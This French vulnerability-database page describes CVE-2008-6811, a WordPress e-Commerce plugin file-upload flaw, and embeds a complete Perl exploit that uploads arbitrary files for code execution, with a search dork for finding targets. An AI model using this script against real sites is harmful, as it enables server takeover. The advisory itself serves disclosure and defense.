CVE-2008-6811 : Détail

CVE-2008-6811

1.68%V3
Network
2009-05-17
14h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Unrestricted file upload vulnerability in image_processing.php in the e-Commerce Plugin 3.4 and earlier for Wordpress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/plugins/wp-shopping-cart/.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 6867

Date de publication : 2008-10-28 23h00 +00:00
Auteur : t0pP8uZz
EDB Vérifié : Yes

#!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand(99999) . ".php"; # no int() print <<INTRO; # messy print i know.. - Wordpress Plugin e-Commerce <= 3.4 Arbitrary File Upload - Discovered && Coded by: t0pP8uZz Discovered on: 20 October 2008 Theres no current vulnerabilitys for this plugin, but the vulnerability explained here no longer exists in the later versions of the plugin, due to a code rewrite. In testing this vulnerability, i wrote a scraping content program, and found ALOT of vulnerable sites. This exploit will upload a selected file to the... ... /wp-content/plugins/wp-shopping-cart/ directory. If the directory is not writable (rare cases) you can mod this exploit and use the insecure GET variable "imagedir" to directory traversal.. so you can upload in diffrent directorys. Contact: irc.rizon.net #sectalk Dork: inurl:"/wp-content/plugins/wp-shopping-cart/" INTRO print "\nEnter URL(ie: http://site.com/mambo): "; chomp(my $url=<STDIN>); print "\nEnter File Path(path to local file to upload): "; chomp(my $file=<STDIN>); my $ua = LWP::UserAgent->new; my $re = $ua->request(POST $url . '/wp-content/plugins/wp-shopping-cart/image_processing.php', Content_Type => 'form-data', Content => [ Submit => "Add", image => [ $file, $fname, Content_Type => 'plain/text' ], ] ); die "Exploit Failed: HTTP POST Failed!" unless $re->is_success; if($re->content =~ /Fatal error/i) { print "Complete! To see if exploit was successfull visit the following URL for your uploaded file.\n"; print "Uploaded File: " . $url . "/wp-content/plugins/wp-shopping-cart/" . $fname . "\n"; } else { print "Exploit Failed! Target host not vulnerable!\n"; } exit; # milw0rm.com [2008-10-29]

Products Mentioned

Configuraton 0

Instinct>>E-commerce_plugin >> Version To (including) 3.4

    Wordpress>>Wordpress >> Version *

    Références

    http://www.securityfocus.com/bid/31982
    Tags : vdb-entry, x_refsource_BID
    https://www.exploit-db.com/exploits/6867
    Tags : exploit, x_refsource_EXPLOIT-DB